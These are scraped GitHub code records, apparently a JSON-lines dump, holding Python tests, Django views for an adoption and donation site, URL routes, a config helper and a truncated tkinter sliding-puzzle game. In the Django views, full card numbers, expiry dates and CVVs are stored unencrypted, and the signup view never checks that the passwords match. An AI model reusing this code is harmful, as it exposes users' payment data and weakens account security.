(\"multiple curly braces\", \"hello {any}, {any}\", [(\"{any}\", \"any\", 6), (\"{any}\", \"any\", 13)]),\n (\"single @ placeholder\", \"hello @any\", [(\"@any\", \"any\", 6)]),\n (\"multiple @ placeholder\", \"hello @any @any\", [(\"@any\", \"any\", 6), (\"@any\", \"any\", 11)]),\n (\"mixed placeholders\", \"hello {any} @any\", [(\"{any}\", \"any\", 6), (\"@any\", \"any\", 12)]),\n (\"unknown placeholders\", \"hello {testing} @testing\", []),\n (\"existing placeholder but appended with text\", \"hello @anyhow\", []),\n (\"@ placeholders without spaces\", \"hello @any@any\", [(\"@any\", \"any\", 6), (\"@any\", \"any\", 10)]),\n (\"{} placeholder without spaces\", \"hello {any}how@any\", [(\"{any}\", \"any\", 6), (\"@any\", \"any\", 14)]),\n ],\n)\n@pytest.mark.asyncio\nasync def test_find_placeholders(test: str, text: str, expected: List[Tuple[str, str, int]]) -> None:\n importer = PlaceholderImporter()\n placeholders = [placeholder async for placeholder in importer.find_placeholders(text)]\n assert placeholders == expected, test\n\n\n@pytest.mark.parametrize(\n \"text, entities, expected\",\n [\n (\"hello world\", [], \"hello world\"),\n (\"hello world\", [{\"start\": 0, \"end\": 5, \"value\": \"hello\", \"entity\": \"GREETING\"}], \"[hello](GREETING) world\"),\n (\n \"hello world\",\n [\n {\"start\": 0, \"end\": 5, \"value\": \"hello\", \"entity\": \"GREETING\"},\n {\"start\": 6, \"end\": 11, \"value\": \"world\", \"entity\": \"LOCATION\"},\n ],\n \"[hello](GREETING) [world](LOCATION)\",\n ),\n ],\n)\n@pytest.mark.asyncio\nasync def test_rebuild_original_text(text: str, entities: List[Dict[str, Any]], expected: str) -> None:\n message = Message.build(text, \"test_intent\", entities)\n original_text = await PlaceholderImporter.rebuild_original_text(message)\n assert expected == original_text\n", "repo_name": "roniemartinez/rasam", "sub_path": "tests/importers/test_placeholder.py", "file_name": "test_placeholder.py", "file_ext": "py", "file_size_in_byte": 7688, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rasa.shared.nlu.training_data.training_data.TrainingData", "line_number": 15, "usage_type": "call"}, {"api_name": "rasa.shared.nlu.training_data.message.Message.build", "line_number": 17, "usage_type": "call"}, {"api_name": "rasa.shared.nlu.training_data.message.Message", "line_number": 17, "usage_type": "name"}, {"api_name": "rasa.shared.nlu.training_data.message.Message.build", "line_number": 18, "usage_type": "call"}, {"api_name": "rasa.shared.nlu.training_data.message.Message", "line_number": 18, "usage_type": "name"}, {"api_name": "rasa.shared.nlu.training_data.message.Message.build", "line_number": 19, "usage_type": "call"}, {"api_name": "rasa.shared.nlu.training_data.message.Message", "line_number": 19, "usage_type": "name"}, {"api_name": "unittest.mock.patch.object", "line_number": 22, "usage_type": "call"}, {"api_name": "rasa.shared.nlu.training_data.loading", "line_number": 22, "usage_type": "argument"}, {"api_name": "unittest.mock.patch", "line_number": 22, "usage_type": "attribute"}, {"api_name": "unittest.mock", "line_number": 22, "usage_type": "name"}, {"api_name": "rasam.PlaceholderImporter", "line_number": 27, "usage_type": "call"}, {"api_name": "rasa.shared.nlu.training_data.message.Message", "line_number": 34, "usage_type": "name"}, {"api_name": "rasa.shared.nlu.training_data.message.Message.build", "line_number": 36, "usage_type": "call"}, {"api_name": "rasa.shared.nlu.training_data.message.Message", "line_number": 36, "usage_type": "name"}, {"api_name": "rasa.shared.nlu.training_data.message.Message.build", "line_number": 37, "usage_type": "call"}, {"api_name": "rasa.shared.nlu.training_data.message.Message", "line_number": 37, "usage_type": "name"}, {"api_name": "rasa.shared.nlu.training_data.message.Message.build", "line_number": 38, "usage_type": "call"}, {"api_name": "rasa.shared.nlu.training_data.message.Message", "line_number": 38, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 13, "usage_type": "attribute"}, {"api_name": "unittest.mock.Mock", "line_number": 70, "usage_type": "attribute"}, {"api_name": "unittest.mock", "line_number": 70, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 73, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 74, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 74, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 76, "usage_type": "name"}, {"api_name": "rasam.PlaceholderImporter", "line_number": 79, "usage_type": "call"}, {"api_name": "rasa.shared.nlu.training_data.message.Message.build", "line_number": 80, "usage_type": "call"}, {"api_name": "rasa.shared.nlu.training_data.message.Message", "line_number": 80, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 46, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 46, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch.object", "line_number": 67, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 67, "usage_type": "attribute"}, {"api_name": "unittest.mock", "line_number": 67, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 68, "usage_type": "attribute"}, {"api_name": "unittest.mock.Mock", "line_number": 159, "usage_type": "attribute"}, {"api_name": "unittest.mock", "line_number": 159, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 162, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 162, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 163, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 163, "usage_type": "name"}, {"api_name": "rasam.PlaceholderImporter", "line_number": 168, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 88, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 88, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch.object", "line_number": 156, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 156, "usage_type": "attribute"}, {"api_name": "unittest.mock", "line_number": 156, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 157, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 188, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 188, "usage_type": "name"}, {"api_name": "rasam.PlaceholderImporter", "line_number": 189, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 173, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 173, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 187, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 210, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 210, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 210, "usage_type": "name"}, {"api_name": "rasa.shared.nlu.training_data.message.Message.build", "line_number": 211, "usage_type": "call"}, {"api_name": "rasa.shared.nlu.training_data.message.Message", "line_number": 211, "usage_type": "name"}, {"api_name": "rasam.PlaceholderImporter.rebuild_original_text", "line_number": 212, "usage_type": "call"}, {"api_name": "rasam.PlaceholderImporter", "line_number": 212, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 194, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 194, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 209, "usage_type": "attribute"}]} +{"seq_id": "33581272562", "text": "from email import message\nfrom email.message import Message\nfrom pyexpat.errors import messages\nfrom ssl import Purpose\nfrom unicodedata import category\nfrom django.shortcuts import render, HttpResponse , redirect\nfrom .models import adoptform,partnerreg,winterdonation,donateanything, givemoney, newboarn, age_3_5y, age_6_10y, age_11_15y, age_16_18y\n#from .models import contactme\nfrom django.contrib.auth import authenticate, login\nfrom home.models import moneydonate \nfrom math import *\nfrom django.contrib.auth.models import User \nfrom django.contrib.auth.forms import UserCreationForm\nfrom .forms import SignUpForm \n\n \ndef sign_up(request):\n if request.method == \"POST\":\n fm = SignUpForm(request.POST)\n if fm.is_valid():\n fm.save()\n else:\n fm = SignUpForm()\n return render(request,'signup.html',{'form':fm})\n\n\n# Create your views here.\ndef index(request):\n return render(request, 'index.html')\n\n\ndef about(request):\n return render(request, 'about.html')\n\ndef payment(request):\n return render(request, 'paymentdone.html')\n\ndef moneyd(request):\n\n return render(request, 'moneyd.html')\n\n'''\ndef partner(request):\n if request.method=='POST':\n Organization = request.POST.get('name')\n Email = request.POST.get('email')\n Phone = request.POST.get('phone')\n Purpose = request.POST.get('purpose')\n Date = request.POST.get('date')\n\n DP=partnerreg(Organization=Organization,Email=Email,Phone=Phone,Purpose=Purpose,Date=Date)\n return render(request, 'partner.html')\n'''\ndef handleSignUp(request):\n if request.method==\"POST\":\n # Get the post parameters\n username=request.POST['username']\n email=request.POST['email']\n fname=request.POST['fname']\n lname=request.POST['lname']\n pass1=request.POST['pass1']\n pass2=request.POST['pass2']\n\n\n # Create the user\n myuser = User.objects.create_user(username, email, pass1)\n myuser.first_name= fname\n myuser.last_name= lname\n myuser.save()\n\n return redirect('/')\n\n else:\n return render(request, 'partner.html')\n\ndef handeLogin(request):\n if request.method==\"POST\":\n # Get the post parameters\n loginusername=request.POST['loginusername']\n loginpassword=request.POST['loginpassword']\n\n user=authenticate(username= loginusername, password= loginpassword)\n if user is not None:\n login(request, user)\n messages.success(request, \"Successfully Logged In\")\n return redirect(\"/about\")\n else:\n messages.error(request, \"Invalid credentials! Please try again\")\n return redirect(\"/contact\")\n\n return HttpResponse(\"404- Not found\")\n\ndef donationdone(request):\n \n return render(request, 'donationdone.html')\n\ndef summerdonation(request):\n \n return render(request, 'summer_campaign.html')\n\ndef Mdonation(request):\n if request.method=='POST':\n first_name = request.POST.get('name')\n email = request.POST.get('email')\n phone = request.POST.get('phone')\n cardno = request.POST.get('cardno')\n exp = request.POST.get('exp')\n cvv = request.POST.get('cvv')\n\n Data=moneydonate(Name=first_name,Email_Id=email,Phone=phone,Card_no=cardno,Exp=exp,Cvv=cvv)\n \n Data.save()\n return render(request, 'Money_Donate.html')\n\ndef winterd(request):\n if request.method=='POST':\n first_name = request.POST.get('name')\n email = request.POST.get('email')\n phone = request.POST.get('phone')\n city = request.POST.get('city')\n state = request.POST.get('state')\n pin = request.POST.get('pin')\n donatebox = request.POST.get('donatebox')\n DW=winterdonation(Name=first_name,Email_Id=email,Phone=phone,City=city,State=state,Pin=pin,Donatebox=donatebox)\n \n DW.save() \n return render(request, 'winter_campaign.html')\n\n\ndef contact(request):\n ''' \n if request.method=='POST':\n first_name = request.POST.get('entry.961833090')\n last_name = request.POST.get('entry.766710902')\n email = request.POST.get('entry.626623658')\n phone = request.POST.get('entry.1165961989')\n message = request.POST.get('entry.1239058374')\n DB=contactme(First_name=first_name,Last_name=last_name,Email_Id=email,Phone=phone,Message=message)\n DB.save()\n '''\n return render(request, 'contact.html')\ndef donation(request):\n\n return render(request, 'donation.html')\n\ndef money_c(request):\n if request.method=='POST':\n first_name = request.POST.get('name')\n email = request.POST.get('email')\n phone = request.POST.get('phone')\n city = request.POST.get('city')\n state = request.POST.get('state')\n pin = request.POST.get('pin')\n donatebox = request.POST.get('donatebox')\n Dm=givemoney(Name=first_name,Email_Id=email,Phone=phone,City=city,State=state,Pin=pin,Donatebox=donatebox)\n \n Dm.save() \n \n return render(request, 'moneyd.html')\n \ndef one_donate(request):\n if request.method=='POST':\n first_name = request.POST.get('name')\n email = request.POST.get('email')\n phone = request.POST.get('phone')\n city = request.POST.get('city')\n state = request.POST.get('state')\n pin = request.POST.get('pin')\n donatebox = request.POST.get('donatebox')\n D=donateanything(Name=first_name,Email_Id=email,Phone=phone,City=city,State=state,Pin=pin,Donatebox=donatebox)\n \n D.save()\n return render(request, 'onedonate.html')\n\n\ndef step(request):\n return render(request, 'step_parents.html')\n\n\ndef story(request):\n return render(request, 'story.html')\n\n\ndef child(request):\n newboarns = newboarn.objects.all()\n n = len(newboarns)\n nSlides = n//4 + ceil((n/4)-(n//4))\n params = {'no_of_slides': nSlides, 'range': range(\n nSlides, 1), 'newboarn': newboarns}\n return render(request, 'meetchildren.html', params)\ndef adopt(request):\n return render(request, 'adopt.html')\n \n\ndef adopt(request):\n if request.method=='POST':\n Aname=request.POST.get('Aname')\n dob=request.POST.get('dob')\n Gender=request.POST.get('gender')\n Category=request.POST.get('Category')\n id=request.POST.get('id')\n idno=request.POST.get('idno')\n email=request.POST.get('email')\n phone=request.POST.get('phone')\n martialstat=request.POST.get('martialstat')\n\n name1=request.POST.get('name1')\n dob1=request.POST.get('dob1')\n gender1=request.POST.get('gender1')\n Category1=request.POST.get('Category1')\n id1=request.POST.get('id1')\n idno1=request.POST.get('idno1')\n\n email1=request.POST.get('email1')\n phone1=request.POST.get('phone1')\n bchild=request.POST.get('bchild')\n achild=request.POST.get('achild')\n\n address=request.POST.get('address')\n district=request.POST.get('district')\n state=request.POST.get('state')\n pincode=request.POST.get('pincode')\n\n address1=request.POST.get('address1')\n district2=request.POST.get('district2')\n state2=request.POST.get('state2')\n pincode2=request.POST.get('pincode2')\n D=adoptform(Applicant_Name=Aname,Date_of_Birth=dob,Gender=Gender,Category=Category,Document=id,ID_NO=idno,\n Email_ID=email,Phone=phone,Martital_Status=martialstat,Spouse_name=name1,Spouse_DOB=dob1,Spouse_Gender=gender1,\n Spouse_Category=Category1,Spouse_Document=id1,Spouse_ID_NO=idno1,Spouse_Email_ID=email1,Spouse_Phone=phone1,\n Biological_children=bchild,Adopted_children=achild,Address=address,District=district,State=state,Pin_code=pincode,\n Current_Address=address1,Current_District=district2,Current_State=state2,Current_Pin_code=pincode2)\n\n\n if request.method=='POST':\n Email_login=request.POST.get('emaillog')\n Password_login=request.POST.get('passlog')\n\n user = authenticate(username=Email_login, password=Password_login)\n \n if user is not None:\n login(request, user)\n Aname = user.Aname\n # messages.success(request, \"Logged In Sucessfully!!\")\n return render(request, \"authentication/adopt.html\",{\"Aname\":Aname})\n else:\n messages.error(request, \"Bad Credentials!!\")\n return redirect('home')\n\n return render(request, 'adopt.html')\n\n\ndef age_3_5(request):\n age_3_5ys = age_3_5y.objects.all()\n n = len(age_3_5ys)\n nSlides = n//4 + ceil((n/4)-(n//4))\n params = {'no_of_slides': nSlides, 'range': range(\n nSlides, 1), 'age_3_5y': age_3_5ys}\n return render(request, 'age_3_5.html', params)\n\n\ndef age_6_10(request):\n age_6_10ys = age_6_10y.objects.all()\n\n n = len(age_6_10ys)\n nSlides = n//4 + ceil((n/4)-(n//4))\n params = {'no_of_slides': nSlides, 'range': range(\n nSlides, 1), 'age_6_10y': age_6_10ys}\n return render(request, 'age_6_10.html', params)\n\n\ndef age_11_15(request):\n age_11_15ys = age_11_15y.objects.all()\n\n n = len(age_11_15ys)\n nSlides = n//4 + ceil((n/4)-(n//4))\n params = {'no_of_slides': nSlides, 'range': range(\n nSlides, 1), 'age_11_15y': age_11_15ys}\n return render(request, 'age_11_15.html', params)\n\n\ndef age_16_18(request):\n age_16_18ys = age_16_18y.objects.all()\n\n n = len(age_16_18ys)\n nSlides = n//4 + ceil((n/4)-(n//4))\n params = {'no_of_slides': nSlides, 'range': range(\n nSlides, 1), 'age_16_18y': age_16_18ys}\n return render(request, 'age_16_18.html', params)\n\n\ndef child_data(request, myid):\n # fetch product by id\n newboarns = newboarn.objects.filter(id=myid)\n print(newboarns)\n return render(request, 'childviewsite.html', {'newboarn': newboarns[0]})\n\n\ndef age_3_5yr(request, myid):\n # fetch product by id\n age_3_5ys = age_3_5y.objects.filter(id=myid)\n print(age_3_5ys)\n return render(request, 'age_3_5_viewsite.html', {'age_3_5y': age_3_5ys[0]})\n\n\ndef age_6_10yr(request, myid):\n # fetch product by id\n age_6_10ys = age_6_10y.objects.filter(id=myid)\n print(age_6_10ys)\n return render(request, 'age_6_10_viewsite.html', {'age_6_10y': age_6_10ys[0]})\n\n\ndef age_11_15yr(request, myid):\n # fetch product by id\n age_11_15ys = age_11_15y.objects.filter(id=myid)\n print(age_11_15ys)\n return render(request, 'age_11_15_viewsite.html', {'age_11_15y': age_11_15ys[0]})\n\n\ndef age_16_18yr(request, myid):\n # fetch product by id\n age_16_18ys = age_16_18y.objects.filter(id=myid)\n print(age_16_18ys)\n return render(request, 'age_16_18_viewsite.html', {'age_16_18y': age_16_18ys[0]})\n\n\n\n", "repo_name": "DestinyDoors/DestinyDoors", "sub_path": "Destiny_Doors/Second/home/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 10719, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "forms.SignUpForm", "line_number": 19, "usage_type": "call"}, {"api_name": "forms.SignUpForm", "line_number": 23, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 24, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 29, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 33, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 36, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 40, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.create_user", "line_number": 66, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 66, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 66, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 71, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 74, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 82, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 84, "usage_type": "call"}, {"api_name": "pyexpat.errors.messages.success", "line_number": 85, "usage_type": "call"}, {"api_name": "pyexpat.errors.messages", "line_number": 85, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 86, "usage_type": "call"}, {"api_name": "pyexpat.errors.messages.error", "line_number": 88, "usage_type": "call"}, {"api_name": "pyexpat.errors.messages", "line_number": 88, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 89, "usage_type": "call"}, {"api_name": "django.shortcuts.HttpResponse", "line_number": 91, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 95, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 99, "usage_type": "call"}, {"api_name": "home.models.moneydonate", "line_number": 110, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 113, "usage_type": "call"}, {"api_name": "models.winterdonation", "line_number": 124, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 127, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 141, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 144, "usage_type": "call"}, {"api_name": "models.givemoney", "line_number": 155, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 159, "usage_type": "call"}, {"api_name": "models.donateanything", "line_number": 170, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 173, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 177, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 181, "usage_type": "call"}, {"api_name": "models.newboarn.objects.all", "line_number": 185, "usage_type": "call"}, {"api_name": "models.newboarn.objects", "line_number": 185, "usage_type": "attribute"}, {"api_name": "models.newboarn", "line_number": 185, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 190, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 192, "usage_type": "call"}, {"api_name": "models.adoptform", "line_number": 228, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 239, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 242, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 245, "usage_type": "call"}, {"api_name": "pyexpat.errors.messages.error", "line_number": 247, "usage_type": "call"}, {"api_name": "pyexpat.errors.messages", "line_number": 247, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 248, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 250, "usage_type": "call"}, {"api_name": "models.age_3_5y.objects.all", "line_number": 254, "usage_type": "call"}, {"api_name": "models.age_3_5y.objects", "line_number": 254, "usage_type": "attribute"}, {"api_name": "models.age_3_5y", "line_number": 254, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 259, "usage_type": "call"}, {"api_name": "models.age_6_10y.objects.all", "line_number": 263, "usage_type": "call"}, {"api_name": "models.age_6_10y.objects", "line_number": 263, "usage_type": "attribute"}, {"api_name": "models.age_6_10y", "line_number": 263, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 269, "usage_type": "call"}, {"api_name": "models.age_11_15y.objects.all", "line_number": 273, "usage_type": "call"}, {"api_name": "models.age_11_15y.objects", "line_number": 273, "usage_type": "attribute"}, {"api_name": "models.age_11_15y", "line_number": 273, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 279, "usage_type": "call"}, {"api_name": "models.age_16_18y.objects.all", "line_number": 283, "usage_type": "call"}, {"api_name": "models.age_16_18y.objects", "line_number": 283, "usage_type": "attribute"}, {"api_name": "models.age_16_18y", "line_number": 283, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 289, "usage_type": "call"}, {"api_name": "models.newboarn.objects.filter", "line_number": 294, "usage_type": "call"}, {"api_name": "models.newboarn.objects", "line_number": 294, "usage_type": "attribute"}, {"api_name": "models.newboarn", "line_number": 294, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 296, "usage_type": "call"}, {"api_name": "models.age_3_5y.objects.filter", "line_number": 301, "usage_type": "call"}, {"api_name": "models.age_3_5y.objects", "line_number": 301, "usage_type": "attribute"}, {"api_name": "models.age_3_5y", "line_number": 301, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 303, "usage_type": "call"}, {"api_name": "models.age_6_10y.objects.filter", "line_number": 308, "usage_type": "call"}, {"api_name": "models.age_6_10y.objects", "line_number": 308, "usage_type": "attribute"}, {"api_name": "models.age_6_10y", "line_number": 308, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 310, "usage_type": "call"}, {"api_name": "models.age_11_15y.objects.filter", "line_number": 315, "usage_type": "call"}, {"api_name": "models.age_11_15y.objects", "line_number": 315, "usage_type": "attribute"}, {"api_name": "models.age_11_15y", "line_number": 315, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 317, "usage_type": "call"}, {"api_name": "models.age_16_18y.objects.filter", "line_number": 322, "usage_type": "call"}, {"api_name": "models.age_16_18y.objects", "line_number": 322, "usage_type": "attribute"}, {"api_name": "models.age_16_18y", "line_number": 322, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 324, "usage_type": "call"}]} +{"seq_id": "32711324048", "text": "from datetime import datetime\nfrom uuid import uuid4\n\n\ndef test_get_event_comment(client_valid_access_token, requests_mock):\n event_comment_uuid = uuid4()\n requests_mock.get(\n f\"http://db-api/api/event/comment/{event_comment_uuid}\",\n json={\n \"event_uuid\": str(uuid4()),\n \"value\": \"value\",\n \"insert_time\": str(datetime.now()),\n \"user\": {\n \"default_alert_queue\": {\"value\": \"queue1\", \"uuid\": str(uuid4())},\n \"default_event_queue\": {\"value\": \"queue1\", \"uuid\": str(uuid4())},\n \"display_name\": \"Analyst\",\n \"email\": \"analyst@test.com\",\n \"roles\": [],\n \"username\": \"analyst\",\n \"uuid\": str(uuid4()),\n },\n \"uuid\": str(uuid4()),\n },\n )\n\n client_valid_access_token.get(f\"/api/event/comment/{event_comment_uuid}\")\n\n assert (len(requests_mock.request_history)) == 2\n assert requests_mock.request_history[1].method == \"GET\"\n assert requests_mock.request_history[1].url == f\"http://db-api/api/event/comment/{event_comment_uuid}\"\n", "repo_name": "seanmcfeely/ace2-ams", "sub_path": "gui_api/app/tests/test_api/event_comment/test_read.py", "file_name": "test_read.py", "file_ext": "py", "file_size_in_byte": 1125, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "uuid.uuid4", "line_number": 6, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 10, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 14, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 15, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 20, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "28760001784", "text": "from django.urls import include, path\nfrom rest_framework.routers import DefaultRouter\n\nfrom . import api\n\napp_name = 'labels_manager'\n\nrouter = DefaultRouter()\nrouter.register(r'labels', api.LabelAPI, basename='label')\nrouter.register(r'label_links', api.LabelLinkAPI, basename='label_link')\napi_urlpatterns = router.urls\n\nurlpatterns = [\n path('api/', include((api_urlpatterns, app_name), namespace='api-labels')),\n path('api/labels/bulk', api.LabelBulkUpdateAPI.as_view(), name='api-labels-bulk'),\n]\n", "repo_name": "HumanSignal/label-studio", "sub_path": "label_studio/labels_manager/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 509, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14812, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.routers.DefaultRouter", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "70012646244", "text": "#!/usr/bin/python\nfrom configparser import ConfigParser\n\n# NOTE: This file isn't being used yet because i couldn't figure\n# out how to get the pathnames working w/ the filename stuff.\n# gonna try this again when refactoring to clean up connection handling code\n#\n# i really don't know how python works lol\n\n\n#\n# @function config -- handles configuration for db connection \n# \n# @param filename -- config file\n# @param section -- section in config file to read from\n#\ndef config(filename='db.ini', section='postgresql'):\n parser = ConfigParser()\n # read config file\n parser.read(filename)\n \n # get section, default to postgresql\n db = {}\n if parser.has_section(section):\n params = parser.items(section)\n for param in params:\n db[param[0]] = param[1]\n else:\n raise Exception('Section {0} not found in the {1} file'.format(section, filename))\n \n return db", "repo_name": "jaythemishra/tunesearch", "sub_path": "SearchEngine/SearchEngine/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 917, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "configparser.ConfigParser", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "10281565872", "text": "# -*- coding: utf-8 -*-\r\n\r\n#%% import\r\nfrom tkinter import *\r\nfrom random import *\r\nimport logging # la gestion d'erreur\r\nfrom tkinter.font import * # les polices\r\nfrom tkinter.messagebox import * # les popup\r\nimport sys # le system pour sys.exit()\r\nfrom time import sleep\r\nimport os\r\nfrom classe_taquin import *\r\nimport subprocess # pour ouvrir le fichier index html a l'aide de python sans passer par os si l'invite de commande est desactiver\r\n\r\ntry: # ce try est juste pour rayan\r\n from fonction_recurante import * # dans le pythonpath ou dans le dossier envoyer\r\nexcept:\r\n sys.path.append(\"C:\\\\10 rayan\\\\NSI\\\\fonction\")\r\n from fonction_recurante import *\r\n\r\n print('importé via sys')\r\n\r\nlogging.basicConfig(format='line=%(lineno)s %(message)s') # pour la gestion d'érreur\r\n\r\n# %% debut du code\r\n\r\n\r\nt = Taquin() # la classe ne peut etre initialiser dans notre main\r\nt.melanger() # car on utilise t dans la class\r\n\r\n\r\nclass Fenetre:\r\n \"\"\"\r\n Cette Class sert a la gestion de l'interface graphique en tkinter\r\n tous ce qui est print n'est pas lu par l'utlisateur mais pas le dev il sert donc a debugoger le jeux\r\n l'interface du taquin commence a la methode init_taquin le reste sert juste a l'interface de base\r\n \"\"\"\r\n\r\n\r\n\r\n\r\n def __init__(self):\r\n \"\"\"\r\n on renvoie a init par convention et pour tinker si il veut s'auto debuger avec le debuger tinker et les init separer sont plus utile au debugage\r\n \"\"\"\r\n self.init()\r\n\r\n def init(self):\r\n \"\"\"\r\n initialise notre fenetre avec nos couleur et la resolution ainsi que le pleine écran et d'autre chose\r\n :return:\r\n \"\"\"\r\n self.epi = False # mode epileptic (esteregg)\r\n self.root = Tk()\r\n self.bg = \"#1e1f29\"\r\n self.root['bg'] = self.bg\r\n self.root.title(\"Taquin\")\r\n self.resolution(\r\n mode='auto') # fonction qui mets la resolution automatiquement en fonction de la resolution de l'ecran 1\r\n self.root.attributes('-fullscreen', False)\r\n self.top_verif = False # si nous souhaiton utiliser des toplevel permet de savoir si ils sont activer ou pas (chez nous non normalement)\r\n Button(self.root, height=0, relief=FLAT, width=0, highlightthickness=0, command=self.f_epi, bg=self.bg).place(\r\n x=0, y=0) # ester egg\r\n\r\n self.bu_fermer = Button(self.root, bg='red', width=10, height=0, relief=FLAT,\r\n command=self.root.destroy)\r\n self.bu_fermer.place(relx=0.988, rely=0.0001)\r\n self.police_ttg = Font(size=30)\r\n self.init_taquin()\r\n\r\n def init_top(self):\r\n \"\"\"\r\n initialise un top level ( cette fonction n'est pas forcement utiliser)\r\n :return:\r\n \"\"\"\r\n self.top = Toplevel(self.root)\r\n self.top['bg'] = 'white'\r\n self.top.title(\"Top\")\r\n self.top.geometry('1920x1080')\r\n self.top_verif = True\r\n full_screen(self.top)\r\n self.bu_fermer = Button(self.top, bg='red', width=10, highlightthickness=0, height=0, relief=FLAT,\r\n command=self.root.destroy).place(relx=0.988, rely=0.0001)\r\n\r\n def affichage(self, top=0):\r\n \"\"\"\r\n Affiche le root\r\n ou le top si il est souhaitez\r\n :param top:\r\n :return:\r\n \"\"\"\r\n if top == 0:\r\n self.root.mainloop()\r\n else:\r\n self.top.mainloop()\r\n\r\n def rename(self, nom, top=0):\r\n \"\"\"\r\n pour rename les fenêtres\r\n :param nom:\r\n :return:\r\n \"\"\"\r\n if top == 